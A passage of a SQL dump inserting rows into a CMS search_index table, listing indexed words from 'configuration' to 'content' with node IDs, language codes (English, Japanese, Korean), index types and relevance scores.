('configuration', 18, 'ko', 'help_search', 8),
('configuration', 23, 'en', 'help_search', 10.3077),
('configuration', 23, 'ja', 'help_search', 10.3077),
('configuration', 23, 'ko', 'help_search', 10.3077),
('configuration', 28, 'en', 'help_search', 11.2476),
('configuration', 28, 'ja', 'help_search', 11.2476),
('configuration', 28, 'ko', 'help_search', 11.2476),
('configuration', 30, 'en', 'help_search', 172.074),
('configuration', 30, 'ja', 'help_search', 172.074),
('configuration', 30, 'ko', 'help_search', 172.074),
('configuration', 31, 'ja', 'help_search', 5),
('configuration', 32, 'en', 'help_search', 7.9074),
('configuration', 32, 'ja', 'help_search', 7.9074),
('configuration', 32, 'ko', 'help_search', 7.9074),
('configuration', 33, 'en', 'help_search', 1),
('configuration', 33, 'ja', 'help_search', 1),
('configuration', 33, 'ko', 'help_search', 1),
('configuration', 37, 'en', 'help_search', 3.49253),
('configuration', 37, 'ja', 'help_search', 3.49253),
('configuration', 37, 'ko', 'help_search', 3.49253),
('configuration', 41, 'en', 'help_search', 7),
('configuration', 41, 'ja', 'help_search', 7),
('configuration', 41, 'ko', 'help_search', 7),
('configuration', 43, 'en', 'help_search', 4.70972),
('configuration', 43, 'ja', 'help_search', 4.70972),
('configuration', 43, 'ko', 'help_search', 4.70972),
('configuration', 45, 'en', 'help_search', 4),
('configuration', 45, 'ja', 'help_search', 4),
('configuration', 45, 'ko', 'help_search', 4),
('configuration', 48, 'en', 'help_search', 5),
('configuration', 48, 'ja', 'help_search', 5),
('configuration', 48, 'ko', 'help_search', 5),
('configuration', 49, 'en', 'help_search', 4);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('configuration', 49, 'ja', 'help_search', 4),
('configuration', 49, 'ko', 'help_search', 4),
('configuration', 50, 'en', 'help_search', 6.91448),
('configuration', 50, 'ja', 'help_search', 6.91448),
('configuration', 50, 'ko', 'help_search', 6.91448),
('configuration', 51, 'en', 'help_search', 4),
('configuration', 51, 'ja', 'help_search', 4),
('configuration', 51, 'ko', 'help_search', 4),
('configuration', 52, 'en', 'help_search', 4),
('configuration', 52, 'ja', 'help_search', 4),
('configuration', 52, 'ko', 'help_search', 4),
('configuration', 53, 'en', 'help_search', 4),
('configuration', 53, 'ja', 'help_search', 4),
('configuration', 53, 'ko', 'help_search', 4),
('configuration', 54, 'en', 'help_search', 4),
('configuration', 54, 'ja', 'help_search', 4),
('configuration', 54, 'ko', 'help_search', 4),
('configuration', 64, 'en', 'help_search', 4),
('configuration', 64, 'ja', 'help_search', 4),
('configuration', 64, 'ko', 'help_search', 4),
('configuration', 66, 'en', 'help_search', 4),
('configuration', 66, 'ja', 'help_search', 4),
('configuration', 67, 'en', 'help_search', 8.77905),
('configuration', 67, 'ja', 'help_search', 8.77905),
('configuration', 67, 'ko', 'help_search', 8.77905),
('configuration', 68, 'en', 'help_search', 2),
('configuration', 68, 'ja', 'help_search', 2),
('configuration', 68, 'ko', 'help_search', 2),
('configuration', 70, 'en', 'help_search', 4),
('configuration', 70, 'ja', 'help_search', 4),
('configuration', 70, 'ko', 'help_search', 4),
('configuration', 71, 'en', 'help_search', 20),
('configuration', 71, 'ja', 'help_search', 20),
('configuration', 71, 'ko', 'help_search', 20),
('configuration', 72, 'en', 'help_search', 16.1957),
('configuration', 72, 'ja', 'help_search', 16.1957),
('configuration', 72, 'ko', 'help_search', 16.1957),
('configuration', 73, 'en', 'help_search', 16),
('configuration', 73, 'ja', 'help_search', 16),
('configuration', 73, 'ko', 'help_search', 16),
('configuration', 75, 'en', 'help_search', 1),
('configuration', 75, 'ja', 'help_search', 1),
('configuration', 75, 'ko', 'help_search', 1),
('configuration', 77, 'en', 'help_search', 4),
('configuration', 77, 'ja', 'help_search', 4),
('configuration', 77, 'ko', 'help_search', 4),
('configuration', 86, 'en', 'help_search', 7.85992),
('configuration', 86, 'ja', 'help_search', 7.85992),
('configuration', 86, 'ko', 'help_search', 7.85992),
('configuration', 92, 'en', 'help_search', 8),
('configuration', 92, 'ja', 'help_search', 8),
('configuration', 92, 'ko', 'help_search', 8),
('configure', 1, 'en', 'help_search', 5),
('configure', 1, 'ja', 'help_search', 5),
('configure', 1, 'ko', 'help_search', 5),
('configure', 2, 'en', 'help_search', 1),
('configure', 2, 'ja', 'help_search', 1),
('configure', 2, 'ko', 'help_search', 1),
('configure', 3, 'en', 'help_search', 5),
('configure', 3, 'ja', 'help_search', 5),
('configure', 3, 'ko', 'help_search', 5),
('configure', 7, 'en', 'help_search', 21),
('configure', 7, 'ja', 'help_search', 21),
('configure', 7, 'ko', 'help_search', 21),
('configure', 8, 'en', 'help_search', 1),
('configure', 8, 'ja', 'help_search', 1),
('configure', 8, 'ko', 'help_search', 1),
('configure', 11, 'en', 'help_search', 1),
('configure', 11, 'ja', 'help_search', 1),
('configure', 11, 'ko', 'help_search', 1),
('configure', 18, 'en', 'help_search', 1),
('configure', 18, 'ja', 'help_search', 1),
('configure', 18, 'ko', 'help_search', 1),
('configure', 22, 'en', 'help_search', 2),
('configure', 22, 'ja', 'help_search', 2),
('configure', 22, 'ko', 'help_search', 2),
('configure', 23, 'en', 'help_search', 2.99315),
('configure', 23, 'ja', 'help_search', 2.99315),
('configure', 23, 'ko', 'help_search', 2.99315),
('configure', 24, 'en', 'help_search', 1),
('configure', 24, 'ja', 'help_search', 1),
('configure', 24, 'ko', 'help_search', 1),
('configure', 25, 'en', 'help_search', 2),
('configure', 25, 'ja', 'help_search', 2),
('configure', 26, 'en', 'help_search', 2),
('configure', 26, 'ja', 'help_search', 2),
('configure', 26, 'ko', 'help_search', 2),
('configure', 28, 'en', 'help_search', 7.40885),
('configure', 28, 'ja', 'help_search', 7.40885),
('configure', 28, 'ko', 'help_search', 7.40885),
('configure', 32, 'en', 'help_search', 4),
('configure', 32, 'ja', 'help_search', 4),
('configure', 32, 'ko', 'help_search', 4),
('configure', 34, 'en', 'help_search', 1),
('configure', 34, 'ja', 'help_search', 1),
('configure', 34, 'ko', 'help_search', 1),
('configure', 41, 'en', 'help_search', 1),
('configure', 41, 'ja', 'help_search', 1),
('configure', 41, 'ko', 'help_search', 1),
('configure', 43, 'en', 'help_search', 2.85752),
('configure', 43, 'ja', 'help_search', 2.85752),
('configure', 43, 'ko', 'help_search', 2.85752),
('configure', 46, 'en', 'help_search', 1),
('configure', 46, 'ja', 'help_search', 1),
('configure', 46, 'ko', 'help_search', 1),
('configure', 48, 'en', 'help_search', 1),
('configure', 48, 'ja', 'help_search', 1),
('configure', 48, 'ko', 'help_search', 1),
('configure', 50, 'en', 'help_search', 5.9074),
('configure', 50, 'ja', 'help_search', 5.9074),
('configure', 50, 'ko', 'help_search', 5.9074),
('configure', 55, 'en', 'help_search', 28),
('configure', 55, 'ja', 'help_search', 28),
('configure', 55, 'ko', 'help_search', 28),
('configure', 60, 'en', 'help_search', 1),
('configure', 60, 'ja', 'help_search', 1),
('configure', 60, 'ko', 'help_search', 1),
('configure', 65, 'en', 'help_search', 1),
('configure', 65, 'ja', 'help_search', 1),
('configure', 65, 'ko', 'help_search', 1),
('configure', 66, 'en', 'help_search', 2),
('configure', 66, 'ja', 'help_search', 2),
('configure', 68, 'en', 'help_search', 2.73993),
('configure', 68, 'ja', 'help_search', 2.73993),
('configure', 68, 'ko', 'help_search', 2.73993),
('configure', 71, 'en', 'help_search', 1),
('configure', 71, 'ja', 'help_search', 1),
('configure', 71, 'ko', 'help_search', 1),
('configure', 72, 'en', 'help_search', 1),
('configure', 72, 'ja', 'help_search', 1),
('configure', 72, 'ko', 'help_search', 1),
('configure', 79, 'en', 'help_search', 21),
('configure', 79, 'ja', 'help_search', 21),
('configure', 79, 'ko', 'help_search', 21),
('configure', 86, 'en', 'help_search', 2),
('configure', 86, 'ja', 'help_search', 2),
('configure', 86, 'ko', 'help_search', 2),
('configure', 92, 'en', 'help_search', 1),
('configure', 92, 'ja', 'help_search', 1),
('configure', 92, 'ko', 'help_search', 1),
('configured', 2, 'en', 'help_search', 1),
('configured', 2, 'ja', 'help_search', 1),
('configured', 2, 'ko', 'help_search', 1),
('configured', 7, 'en', 'help_search', 1),
('configured', 7, 'ja', 'help_search', 1),
('configured', 7, 'ko', 'help_search', 1),
('configured', 36, 'en', 'help_search', 1),
('configured', 36, 'ja', 'help_search', 1),
('configured', 36, 'ko', 'help_search', 1),
('configured', 41, 'en', 'help_search', 1),
('configured', 41, 'ja', 'help_search', 1),
('configured', 41, 'ko', 'help_search', 1),
('configured', 52, 'en', 'help_search', 1),
('configured', 52, 'ja', 'help_search', 1),
('configured', 52, 'ko', 'help_search', 1),
('configured', 56, 'en', 'help_search', 1),
('configured', 56, 'ja', 'help_search', 1),
('configured', 56, 'ko', 'help_search', 1),
('configured', 67, 'en', 'help_search', 0.909743),
('configured', 67, 'ja', 'help_search', 0.909743),
('configured', 67, 'ko', 'help_search', 0.909743),
('configured', 68, 'en', 'help_search', 2.74449),
('configured', 68, 'ja', 'help_search', 2.74449),
('configured', 68, 'ko', 'help_search', 2.74449),
('configured', 86, 'en', 'help_search', 1),
('configured', 86, 'ja', 'help_search', 1),
('configured', 86, 'ko', 'help_search', 1),
('configured', 92, 'en', 'help_search', 1),
('configured', 92, 'ja', 'help_search', 1),
('configured', 92, 'ko', 'help_search', 1),
('configuring', 1, 'en', 'help_search', 26),
('configuring', 1, 'ja', 'help_search', 26),
('configuring', 1, 'ko', 'help_search', 26),
('configuring', 3, 'en', 'help_search', 1),
('configuring', 3, 'ja', 'help_search', 1),
('configuring', 3, 'ko', 'help_search', 1),
('configuring', 7, 'en', 'help_search', 26),
('configuring', 7, 'ja', 'help_search', 26),
('configuring', 7, 'ko', 'help_search', 26),
('configuring', 9, 'en', 'help_search', 2),
('configuring', 9, 'ja', 'help_search', 2),
('configuring', 9, 'ko', 'help_search', 2),
('configuring', 11, 'en', 'help_search', 0.879565),
('configuring', 11, 'ja', 'help_search', 0.879565),
('configuring', 11, 'ko', 'help_search', 0.879565),
('configuring', 18, 'en', 'help_search', 26),
('configuring', 18, 'ja', 'help_search', 26),
('configuring', 18, 'ko', 'help_search', 26),
('configuring', 25, 'en', 'help_search', 26),
('configuring', 25, 'ja', 'help_search', 26),
('configuring', 26, 'en', 'help_search', 26),
('configuring', 26, 'ja', 'help_search', 26),
('configuring', 26, 'ko', 'help_search', 26),
('configuring', 32, 'en', 'help_search', 37.4847),
('configuring', 32, 'ja', 'help_search', 37.4847),
('configuring', 32, 'ko', 'help_search', 37.4847),
('configuring', 45, 'en', 'help_search', 28),
('configuring', 45, 'ja', 'help_search', 28),
('configuring', 45, 'ko', 'help_search', 28),
('configuring', 46, 'en', 'help_search', 0.953396),
('configuring', 46, 'ja', 'help_search', 0.953396),
('configuring', 46, 'ko', 'help_search', 0.953396),
('configuring', 50, 'en', 'help_search', 26),
('configuring', 50, 'ja', 'help_search', 26),
('configuring', 50, 'ko', 'help_search', 26),
('configuring', 63, 'en', 'help_search', 1),
('configuring', 63, 'ja', 'help_search', 1),
('configuring', 63, 'ko', 'help_search', 1),
('configuring', 64, 'en', 'help_search', 1),
('configuring', 64, 'ja', 'help_search', 1),
('configuring', 64, 'ko', 'help_search', 1),
('configuring', 65, 'en', 'help_search', 45),
('configuring', 65, 'ja', 'help_search', 45),
('configuring', 65, 'ko', 'help_search', 45),
('configuring', 66, 'en', 'help_search', 26),
('configuring', 66, 'ja', 'help_search', 26),
('configuring', 66, 'ko', 'help_search', 26),
('configuring', 67, 'en', 'help_search', 1.91323),
('configuring', 67, 'ja', 'help_search', 1.91323),
('configuring', 67, 'ko', 'help_search', 1.91323),
('configuring', 68, 'en', 'help_search', 42.7117),
('configuring', 68, 'ja', 'help_search', 42.7117),
('configuring', 68, 'ko', 'help_search', 42.7117),
('configuring', 72, 'en', 'help_search', 26),
('configuring', 72, 'ja', 'help_search', 26),
('configuring', 72, 'ko', 'help_search', 26),
('configuring', 79, 'en', 'help_search', 26),
('configuring', 79, 'ja', 'help_search', 26),
('configuring', 79, 'ko', 'help_search', 26),
('configuring', 80, 'en', 'help_search', 0.920273),
('configuring', 80, 'ja', 'help_search', 0.920273),
('configuring', 80, 'ko', 'help_search', 0.920273),
('configuring', 86, 'en', 'help_search', 26),
('configuring', 86, 'ja', 'help_search', 26),
('configuring', 86, 'ko', 'help_search', 26),
('configuring', 89, 'en', 'help_search', 1),
('configuring', 89, 'ja', 'help_search', 1),
('configuring', 89, 'ko', 'help_search', 1),
('configuring', 92, 'en', 'help_search', 26),
('configuring', 92, 'ja', 'help_search', 26),
('configuring', 92, 'ko', 'help_search', 26),
('configuring', 93, 'en', 'help_search', 0.805455),
('configuring', 93, 'ja', 'help_search', 0.805455),
('configuring', 93, 'ko', 'help_search', 0.805455),
('confirm', 74, 'en', 'help_search', 1),
('confirm', 74, 'ja', 'help_search', 1),
('confirm', 74, 'ko', 'help_search', 1),
('confirmation', 75, 'en', 'help_search', 1),
('confirmation', 75, 'ja', 'help_search', 1),
('confirmation', 75, 'ko', 'help_search', 1),
('confirmation', 79, 'en', 'help_search', 1),
('confirmation', 79, 'ja', 'help_search', 1),
('confirmation', 79, 'ko', 'help_search', 1),
('confused', 89, 'en', 'help_search', 1),
('confused', 89, 'ja', 'help_search', 1),
('confused', 89, 'ko', 'help_search', 1),
('congralutations', 96, 'en', 'node_search', 28),
('congralutations', 96, 'ja', 'node_search', 28),
('congralutations', 97, 'en', 'node_search', 48),
('congralutations', 97, 'ja', 'node_search', 28),
('congralutations', 99, 'en', 'node_search', 48),
('congralutations', 99, 'ja', 'node_search', 28),
('congrats', 70, 'en', 'node_search', 27),
('congrats', 70, 'ja', 'node_search', 27),
('congrats', 78, 'en', 'node_search', 1),
('congrats', 78, 'ja', 'node_search', 1),
('congrats', 102, 'en', 'node_search', 27),
('congrats', 102, 'ja', 'node_search', 27),
('congrats', 106, 'en', 'node_search', 27),
('congrats', 106, 'ja', 'node_search', 27),
('congrats', 109, 'en', 'node_search', 27),
('congrats', 109, 'ja', 'node_search', 27),
('congrats', 112, 'en', 'node_search', 28),
('congrats', 112, 'ja', 'node_search', 27),
('congrats', 114, 'en', 'node_search', 27),
('congrats', 114, 'ja', 'node_search', 27),
('congrats', 115, 'en', 'node_search', 27),
('congrats', 115, 'ja', 'node_search', 27),
('congrats', 117, 'en', 'node_search', 27),
('congrats', 117, 'ja', 'node_search', 27),
('congrats', 118, 'en', 'node_search', 27),
('congrats', 118, 'ja', 'node_search', 27),
('congrats', 119, 'en', 'node_search', 27),
('congrats', 119, 'ja', 'node_search', 27),
('congrats', 121, 'en', 'node_search', 27),
('congrats', 121, 'ja', 'node_search', 27),
('congrats', 123, 'en', 'node_search', 27),
('congrats', 123, 'ja', 'node_search', 27),
('congrats', 124, 'en', 'node_search', 27),
('congrats', 124, 'ja', 'node_search', 27),
('congrats', 125, 'en', 'node_search', 27),
('congrats', 125, 'ja', 'node_search', 27),
('congrats', 127, 'en', 'node_search', 28),
('congrats', 127, 'ja', 'node_search', 28),
('congrats', 128, 'en', 'node_search', 27),
('congrats', 128, 'ja', 'node_search', 27),
('congrats', 129, 'en', 'node_search', 27),
('congrats', 129, 'ja', 'node_search', 27),
('congrats', 130, 'en', 'node_search', 27),
('congrats', 130, 'ja', 'node_search', 27),
('congrats', 131, 'en', 'node_search', 27),
('congrats', 131, 'ja', 'node_search', 27),
('congrats', 141, 'en', 'node_search', 27),
('congrats', 141, 'ja', 'node_search', 27),
('congratulate', 154, 'en', 'node_search', 1),
('congratulate', 161, 'en', 'node_search', 1),
('congratulate', 174, 'en', 'node_search', 1),
('congratulate', 179, 'en', 'node_search', 1),
('congratulate', 180, 'en', 'node_search', 1),
('congratulate', 181, 'en', 'node_search', 1),
('congratulate', 185, 'en', 'node_search', 1),
('congratulate', 187, 'en', 'node_search', 1),
('congratulate', 188, 'en', 'node_search', 1),
('congratulate', 190, 'en', 'node_search', 1),
('congratulate', 191, 'en', 'node_search', 1),
('congratulate', 192, 'en', 'node_search', 1),
('congratulate', 194, 'en', 'node_search', 1),
('congratulate', 196, 'en', 'node_search', 1),
('congratulate', 199, 'en', 'node_search', 1),
('congratulation', 83, 'en', 'node_search', 27),
('congratulation', 83, 'ja', 'node_search', 27),
('congratulation', 88, 'en', 'node_search', 27),
('congratulation', 88, 'ja', 'node_search', 27),
('congratulation', 152, 'en', 'node_search', 27),
('congratulation', 152, 'ja', 'node_search', 27),
('congratulations', 68, 'en', 'node_search', 54),
('congratulations', 68, 'ja', 'node_search', 28),
('congratulations', 69, 'en', 'node_search', 29),
('congratulations', 69, 'ja', 'node_search', 28),
('congratulations', 70, 'en', 'node_search', 20),
('congratulations', 71, 'en', 'node_search', 29),
('congratulations', 71, 'ja', 'node_search', 27),
('congratulations', 72, 'en', 'node_search', 47),
('congratulations', 72, 'ja', 'node_search', 27),
('congratulations', 73, 'en', 'node_search', 47),
('congratulations', 73, 'ja', 'node_search', 27),
('congratulations', 74, 'en', 'node_search', 47),
('congratulations', 74, 'ja', 'node_search', 27),
('congratulations', 75, 'en', 'node_search', 47),
('congratulations', 76, 'en', 'node_search', 36),
('congratulations', 76, 'ja', 'node_search', 28),
('congratulations', 77, 'en', 'node_search', 36),
('congratulations', 77, 'ja', 'node_search', 28),
('congratulations', 78, 'en', 'node_search', 50),
('congratulations', 78, 'ja', 'node_search', 27),
('congratulations', 79, 'en', 'node_search', 29),
('congratulations', 80, 'en', 'node_search', 36),
('congratulations', 80, 'ja', 'node_search', 27.9973),
('congratulations', 81, 'en', 'node_search', 35),
('congratulations', 81, 'ja', 'node_search', 27),
('congratulations', 82, 'en', 'node_search', 47),
('congratulations', 83, 'en', 'node_search', 20),
('congratulations', 84, 'en', 'node_search', 47),
('congratulations', 85, 'en', 'node_search', 53),
('congratulations', 85, 'ja', 'node_search', 27),
('congratulations', 86, 'en', 'node_search', 47),
('congratulations', 86, 'ja', 'node_search', 27),
('congratulations', 88, 'en', 'node_search', 21),
('congratulations', 88, 'ja', 'node_search', 1),
('congratulations', 89, 'en', 'node_search', 48),
('congratulations', 89, 'ja', 'node_search', 28),
('congratulations', 90, 'en', 'node_search', 47),
('congratulations', 91, 'en', 'node_search', 48),
('congratulations', 91, 'ja', 'node_search', 28),
('congratulations', 92, 'en', 'node_search', 48),
('congratulations', 92, 'ja', 'node_search', 28),
('congratulations', 93, 'en', 'node_search', 48),
('congratulations', 93, 'ja', 'node_search', 28),
('congratulations', 94, 'en', 'node_search', 48),
('congratulations', 96, 'en', 'node_search', 20),
('congratulations', 100, 'en', 'node_search', 53),
('congratulations', 100, 'ja', 'node_search', 27),
('congratulations', 101, 'en', 'node_search', 47),
('congratulations', 101, 'ja', 'node_search', 27),
('congratulations', 102, 'en', 'node_search', 23),
('congratulations', 103, 'en', 'node_search', 48),
('congratulations', 103, 'ja', 'node_search', 28),
('congratulations', 104, 'en', 'node_search', 29),
('congratulations', 104, 'ja', 'node_search', 27),
('congratulations', 105, 'en', 'node_search', 48),
('congratulations', 105, 'ja', 'node_search', 28),
('congratulations', 106, 'en', 'node_search', 20),
('congratulations', 107, 'en', 'node_search', 47),
('congratulations', 107, 'ja', 'node_search', 27),
('congratulations', 108, 'en', 'node_search', 48),
('congratulations', 108, 'ja', 'node_search', 28),
('congratulations', 109, 'en', 'node_search', 23),
('congratulations', 110, 'en', 'node_search', 47),
('congratulations', 110, 'ja', 'node_search', 27),
('congratulations', 111, 'en', 'node_search', 48),
('congratulations', 111, 'ja', 'node_search', 28),
('congratulations', 112, 'en', 'node_search', 19),
('congratulations', 113, 'en', 'node_search', 48),
('congratulations', 113, 'ja', 'node_search', 28),
('congratulations', 114, 'en', 'node_search', 20),
('congratulations', 115, 'en', 'node_search', 20),
('congratulations', 117, 'en', 'node_search', 20),
('congratulations', 118, 'en', 'node_search', 20),
('congratulations', 119, 'en', 'node_search', 20),
('congratulations', 121, 'en', 'node_search', 20),
('congratulations', 123, 'en', 'node_search', 2),
('congratulations', 124, 'en', 'node_search', 2),
('congratulations', 125, 'en', 'node_search', 20),
('congratulations', 127, 'en', 'node_search', 19),
('congratulations', 128, 'en', 'node_search', 20),
('congratulations', 128, 'ja', 'node_search', 1),
('congratulations', 129, 'en', 'node_search', 20),
('congratulations', 129, 'ja', 'node_search', 1),
('congratulations', 130, 'en', 'node_search', 20),
('congratulations', 130, 'ja', 'node_search', 1),
('congratulations', 131, 'en', 'node_search', 2),
('congratulations', 132, 'en', 'node_search', 47),
('congratulations', 132, 'ja', 'node_search', 27),
('congratulations', 134, 'en', 'node_search', 47),
('congratulations', 134, 'ja', 'node_search', 27),
('congratulations', 137, 'en', 'node_search', 47),
('congratulations', 137, 'ja', 'node_search', 27),
('congratulations', 139, 'en', 'node_search', 47),
('congratulations', 139, 'ja', 'node_search', 27),
('congratulations', 140, 'en', 'node_search', 1),
('congratulations', 141, 'en', 'node_search', 20),
('congratulations', 143, 'en', 'node_search', 47),
('congratulations', 143, 'ja', 'node_search', 27),
('congratulations', 144, 'en', 'node_search', 47),
('congratulations', 144, 'ja', 'node_search', 27),
('congratulations', 145, 'en', 'node_search', 47),
('congratulations', 145, 'ja', 'node_search', 27),
('congratulations', 146, 'en', 'node_search', 51),
('congratulations', 146, 'ja', 'node_search', 27),
('congratulations', 147, 'en', 'node_search', 53),
('congratulations', 147, 'ja', 'node_search', 27),
('congratulations', 148, 'en', 'node_search', 47),
('congratulations', 148, 'ja', 'node_search', 27),
('congratulations', 149, 'en', 'node_search', 47),
('congratulations', 151, 'en', 'node_search', 47),
('congratulations', 151, 'ja', 'node_search', 27),
('congratulations', 153, 'en', 'node_search', 47),
('congratulations', 153, 'ja', 'node_search', 27),
('congratulations', 156, 'en', 'node_search', 1),
('congratulations', 157, 'en', 'node_search', 1),
('congratulations', 160, 'en', 'node_search', 1),
('congratulations', 161, 'en', 'node_search', 1),
('congratulations', 164, 'en', 'node_search', 1),
('congratulations', 165, 'en', 'node_search', 1),
('congratulations', 166, 'en', 'node_search', 2),
('congratulations', 168, 'en', 'node_search', 1),
('congratulations', 170, 'en', 'node_search', 2),
('congratulations', 171, 'en', 'node_search', 1),
('congratulations', 177, 'en', 'node_search', 1),
('congratulations', 182, 'en', 'node_search', 1),
('congratulations', 183, 'en', 'node_search', 1),
('congratulations', 186, 'en', 'node_search', 1),
('congratulations', 189, 'en', 'node_search', 1),
('congratulations', 193, 'en', 'node_search', 1),
('congratulations', 195, 'en', 'node_search', 1),
('congratulations', 197, 'en', 'node_search', 1),
('congratulations', 198, 'en', 'node_search', 1),
('connect', 23, 'en', 'node_search', 0.920273),
('connect', 24, 'en', 'node_search', 1.87634),
('connect', 25, 'en', 'node_search', 1),
('connect', 28, 'en', 'help_search', 0.848323),
('connect', 28, 'ja', 'help_search', 0.848323),
('connect', 28, 'ko', 'help_search', 0.848323),
('connected', 23, 'en', 'help_search', 1),
('connected', 23, 'ja', 'help_search', 1),
('connected', 23, 'ko', 'help_search', 1),
('connecting', 23, 'en', 'help_search', 26),
('connecting', 23, 'en', 'node_search', 0.906287),
('connecting', 23, 'ja', 'help_search', 26),
('connecting', 23, 'ko', 'help_search', 26),
('connecting', 24, 'en', 'node_search', 3.47031),
('connecting', 160, 'en', 'node_search', 1),
('connecting', 179, 'en', 'node_search', 1),
('conquer', 62, 'en', 'node_search', 1),
('consist', 31, 'ja', 'help_search', 1),
('consistent', 183, 'en', 'node_search', 1),
('consistent', 199, 'en', 'node_search', 1),
('consistently', 80, 'en', 'node_search', 1),
('consists', 81, 'en', 'help_search', 1),
('consists', 81, 'ja', 'help_search', 1),
('consists', 81, 'ko', 'help_search', 1),
('constantly', 23, 'en', 'node_search', 0.776703),
('constantly', 24, 'en', 'node_search', 0.747619),
('constructed', 27, 'en', 'node_search', 0.738408),
('construction', 5, 'en', 'node_search', 3),
('construction', 5, 'ko', 'node_search', 3),
('construction', 23, 'en', 'node_search', 3),
('construction', 24, 'en', 'node_search', 0.923838),
('construction', 27, 'en', 'node_search', 26.5243),
('constructionservice', 27, 'en', 'node_search', 0.774192),
('consultants', 27, 'en', 'node_search', 0.993146),
('consume', 6, 'en', 'help_search', 1),
('consume', 6, 'ja', 'help_search', 1),
('consume', 6, 'ko', 'help_search', 1),
('contact', 4, 'en', 'node_search', 16),
('contact', 4, 'ja', 'node_search', 16),
('contact', 4, 'ko', 'node_search', 43),
('contact', 5, 'en', 'node_search', 16),
('contact', 5, 'ja', 'node_search', 0.733888),
('contact', 5, 'ko', 'node_search', 16),
('contact', 7, 'en', 'help_search', 1),
('contact', 7, 'ja', 'help_search', 1),
('contact', 7, 'ko', 'help_search', 1),
('contact', 11, 'en', 'node_search', 27),
('contact', 17, 'en', 'help_search', 51),
('contact', 17, 'ja', 'help_search', 51),
('contact', 17, 'ko', 'help_search', 51),
('contact', 18, 'en', 'help_search', 44),
('contact', 18, 'en', 'node_search', 15),
('contact', 18, 'ja', 'help_search', 44),
('contact', 18, 'ja', 'node_search', 13.4411),
('contact', 18, 'ko', 'help_search', 44),
('contact', 18, 'ko', 'node_search', 15),
('contact', 19, 'en', 'help_search', 38),
('contact', 19, 'ja', 'help_search', 38),
('contact', 19, 'ko', 'help_search', 38),
('contact', 20, 'en', 'help_search', 98),
('contact', 20, 'ja', 'help_search', 98),
('contact', 20, 'ko', 'help_search', 98),
('contact', 21, 'en', 'help_search', 47),
('contact', 21, 'ja', 'help_search', 47),
('contact', 21, 'ko', 'help_search', 47),
('contact', 31, 'en', 'node_search', 1.69559),
('contact', 66, 'en', 'node_search', 0.931053),
('contact', 155, 'en', 'node_search', 1),
('contact', 162, 'en', 'node_search', 0.866793),
('contain', 43, 'en', 'help_search', 1),
('contain', 43, 'ja', 'help_search', 1),
('contain', 43, 'ko', 'help_search', 1),
('contain', 80, 'en', 'help_search', 1),
('contain', 80, 'ja', 'help_search', 1),
('contain', 80, 'ko', 'help_search', 1),
('contain', 89, 'en', 'help_search', 1),
('contain', 89, 'ja', 'help_search', 1),
('contain', 89, 'ko', 'help_search', 1),
('containing', 12, 'en', 'help_search', 1),
('containing', 12, 'ja', 'help_search', 1),
('containing', 12, 'ko', 'help_search', 1),
('containing', 48, 'en', 'help_search', 1),
('containing', 48, 'ja', 'help_search', 1),
('containing', 48, 'ko', 'help_search', 1),
('containing', 51, 'en', 'help_search', 1),
('containing', 51, 'ja', 'help_search', 1),
('containing', 51, 'ko', 'help_search', 1),
('containing', 68, 'en', 'help_search', 0.949597),
('containing', 68, 'ja', 'help_search', 0.949597),
('containing', 68, 'ko', 'help_search', 0.949597),
('containing', 91, 'en', 'help_search', 2),
('containing', 91, 'ja', 'help_search', 2),
('containing', 91, 'ko', 'help_search', 2),
('contains', 1, 'en', 'help_search', 1),
('contains', 1, 'ja', 'help_search', 1),
('contains', 1, 'ko', 'help_search', 1),
('contains', 22, 'en', 'help_search', 1),
('contains', 22, 'ja', 'help_search', 1),
('contains', 22, 'ko', 'help_search', 1),
('contains', 30, 'en', 'help_search', 0.824901),
('contains', 30, 'ja', 'help_search', 0.824901),
('contains', 30, 'ko', 'help_search', 0.824901),
('contains', 69, 'en', 'help_search', 1),
('contains', 69, 'ja', 'help_search', 1),
('contains', 69, 'ko', 'help_search', 1),
('content', 2, 'en', 'help_search', 28),
('content', 2, 'ja', 'help_search', 28),
('content', 2, 'ko', 'help_search', 28),
('content', 4, 'en', 'help_search', 36),
('content', 4, 'ja', 'help_search', 36),
('content', 4, 'ko', 'help_search', 36),
('content', 6, 'en', 'help_search', 1),
('content', 6, 'ja', 'help_search', 1),
('content', 6, 'ko', 'help_search', 1),
('content', 7, 'en', 'help_search', 18.6752),
('content', 7, 'ja', 'help_search', 18.6752),
('content', 7, 'ko', 'help_search', 18.6752),
('content', 8, 'en', 'help_search', 2),
('content', 8, 'ja', 'help_search', 2),
('content', 8, 'ko', 'help_search', 2),
('content', 9, 'en', 'help_search', 8),
('content', 9, 'ja', 'help_search', 8),
('content', 9, 'ko', 'help_search', 8),
('content', 10, 'en', 'help_search', 9),
('content', 10, 'ja', 'help_search', 9),
('content', 10, 'ko', 'help_search', 9),
('content', 11, 'en', 'help_search', 6),
('content', 11, 'ja', 'help_search', 6),
('content', 11, 'ko', 'help_search', 6),
('content', 17, 'en', 'help_search', 2),
('content', 17, 'ja', 'help_search', 2),
('content', 17, 'ko', 'help_search', 2),
('content', 23, 'en', 'help_search', 4),
('content', 23, 'ja', 'help_search', 4),
('content', 23, 'ko', 'help_search', 4),
('content', 24, 'en', 'help_search', 11),
('content', 24, 'ja', 'help_search', 11),
('content', 24, 'ko', 'help_search', 11),
('content', 25, 'en', 'help_search', 6),
('content', 25, 'ja', 'help_search', 6),
('content', 26, 'en', 'help_search', 6),
('content', 26, 'ja', 'help_search', 6),
('content', 26, 'ko', 'help_search', 6),
('content', 27, 'en', 'help_search', 19),
('content', 27, 'ja', 'help_search', 19),
('content', 27, 'ko', 'help_search', 19),
('content', 28, 'en', 'help_search', 3.87562),
('content', 28, 'ja', 'help_search', 3.87562),
('content', 28, 'ko', 'help_search', 3.87562),
('content', 29, 'en', 'help_search', 4.97685),
('content', 29, 'ja', 'help_search', 4.97685),
('content', 29, 'ko', 'help_search', 4.97685),
('content', 30, 'en', 'help_search', 1),
('content', 30, 'ja', 'help_search', 1),
('content', 30, 'ko', 'help_search', 1),
('content', 31, 'ja', 'help_search', 89.8735),
('content', 32, 'en', 'help_search', 1),
('content', 32, 'ja', 'help_search', 1),
('content', 32, 'ko', 'help_search', 1),
('content', 33, 'en', 'help_search', 2),
('content', 33, 'ja', 'help_search', 2),
('content', 33, 'ko', 'help_search', 2),
('content', 35, 'en', 'help_search', 5),
('content', 35, 'ja', 'help_search', 5),
('content', 35, 'ko', 'help_search', 5),
('content', 36, 'en', 'help_search', 2),
